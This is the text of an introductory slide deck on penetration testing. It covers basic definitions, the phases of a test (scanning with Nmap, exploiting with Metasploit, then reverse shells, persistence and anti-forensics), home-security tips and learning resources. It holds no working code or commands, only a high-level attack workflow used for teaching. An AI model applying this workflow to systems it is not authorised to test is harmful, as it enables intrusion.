Offensive Security Part 1 Basics of Penetration Testing Dennis (Linuz) Maldonado
About me Dennis Maldonado, AKA Linuz My Blog: http://kernelmeltdown.org/blog/ Tutorials/Walkthroughs News and Events Recordings/Powerpoints Twitter https://twitter.com/dennismald IRC irc.freenode.net -- #CougarCS Email dennis@kernelmeltdown.org
Definitions A vulnerability is a weakness in a computer system that an attacker can take advantage of. Vulnerability assessment is the act of identifying vulnerabilities for a specific computer or network. An exploit is the code that allows the attacker to take advantage of the vulnerability.
Definitions A payload is code or a program that runs after an exploit is successfully executed. A backdoor a method of bypassing normal authentication. A shell allows us to interface with a system, typically through a command line.
Vulnerability Assessment Scan the IP Address or Hostname of the victim to get the ports and services that are running. Identify whether these services are vulnerable Launch an exploit against the vulnerable services and send a payload.
Steps in a Penetration Test Information Gathering Information on the server Any web server? Nmap Vulnerability Identification Nmap version scans/OS scans Other scanning tools Exploitation Bruteforcing Remote Exploits Post Exploitation Reverse shells Persistence Anti-Forensics Etc…
Tools BackTrack Linux 5 R2/R3 – Our attacker machine Nmap Network Scanner – Used for identifying ports and services our victim is running Metasploit Framework – Used for exploiting, generating the payload, and establishing a session with our victim.
The Metasploit Project Metasploit is an open-source framework used for Security development and testing Information gathering and fingerprinting Exploitation/Penetration testing Payload generation and encoding Fuzzing And much more…
Steps in compromising Port Scan/Version scans Fingerprint / Open Ports Exploit + Payload Reverse Shell alpapacas
Demo/Workshop ...
How to secure yourself Set up a firewall Windows Firewall Comodo Personal Firewall Install and update your Anti-Virus Microsoft Security Essentials Nod32 Keep your system up to date Actually apply that flash update Be cautious Watch where you internet Don’t just download anything!
Want to learn more? Kernel Meltdown Blog Learn how to use Linux Download BackTrack Linux Learn networking and the tools Use the command line interface Online Resources Metasploit Unleashed (Metasploit Guide) Also check out some forums Security Tube Security Podcasts Security Now by Steve Gibson PaulDotCom Security Weekly Others… Come talk to me
Sources BackTrack-Linux The Metasploit Project Nmap http://www.backtrack-linux.org/ The Metasploit Project http://www.metasploit.com/ Nmap http://nmap.org/ Metasploit Unleashed http://www.offensive-security.com/metasploit-unleashed/Main_Page Security Tube http://www.securitytube.net/